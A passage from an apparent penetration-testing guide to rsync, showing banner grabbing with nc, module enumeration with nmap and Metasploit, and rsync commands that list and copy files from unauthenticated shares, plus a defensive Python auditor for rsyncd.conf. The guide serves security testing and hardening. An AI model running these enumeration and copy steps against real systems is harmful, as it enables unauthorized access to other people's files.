PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
Information Gathering
Banner & Manual communication
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the server to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Server closes the connection

# Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
Enumerating Shared Folders
Rsync modules are recognized as directory shares that might be protected with passwords. To identify available modules and check if they require passwords, the following commands are used:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
## Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
Be aware that some shares may be hidden and therefore not appear in the list. Additionally, access to some shares might be restricted to specific credentials, indicated by an “Access Denied” message.
Upon obtaining a module list, actions depend on whether authentication is needed. Without authentication, listing and copying files from a shared folder to a local directory is achieved through:
## Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
## Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
This process recursively transfers files, preserving their attributes and permissions.
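On the server side, whether a module appears in the listing, asks for a password, or accepts uploads is decided in rsyncd.conf. The following is an added example (not part of the original page) that parses a config and flags modules allowing anonymous access, uploads or enumeration; the sample config, its paths and network range are constructed, and line continuations and include directives are not handled.

```python
import re
TRUE = {"yes", "true", "1"}

def parse_rsyncd_conf(text):
    """Return {module: settings}. Globals set before the first module act as
    defaults; whitespace inside parameter names is ignored, as rsyncd does."""
    defaults, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = modules.setdefault(header.group(1).strip(), dict(defaults))
            continue
        name, sep, value = line.partition("=")
        if sep:
            key = re.sub(r"\s+", "", name).lower()
            (defaults if current is None else current)[key] = value.strip()
    return modules

def audit(text):
    """Return {module: [findings]} for settings that widen exposure."""
    report = {}
    for name, cfg in parse_rsyncd_conf(text).items():
        findings = []
        if not cfg.get("authusers"):
            findings.append("no 'auth users': anonymous access")
        if cfg.get("readonly", "yes").lower() not in TRUE:  # default is yes
            findings.append("'read only' disabled: clients can upload")
        if cfg.get("list", "yes").lower() in TRUE:          # default is yes
            findings.append("listed in module enumeration")
        if not cfg.get("hostsallow"):
            findings.append("no 'hosts allow' restriction")
        report[name] = findings
    return report

# Constructed sample config; module names reuse those from the listing above.
SAMPLE = """\
hosts allow = 192.168.0.0/24
[NAS_Public]
path = /volume1/public
read only = no
[raidroot]
path = /volume1
auth users = backup
secrets file = /etc/rsyncd.secrets
list = no
"""
for module, findings in audit(SAMPLE).items():
    print(module, findings or "no findings")
```

Note that `list = no` only removes a module from the listing; the module is still reachable by name, so it does not replace `auth users` and `hosts allow`.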
With credentials, listing and downloading from a shared folder can be done as follows, where a password prompt will appear: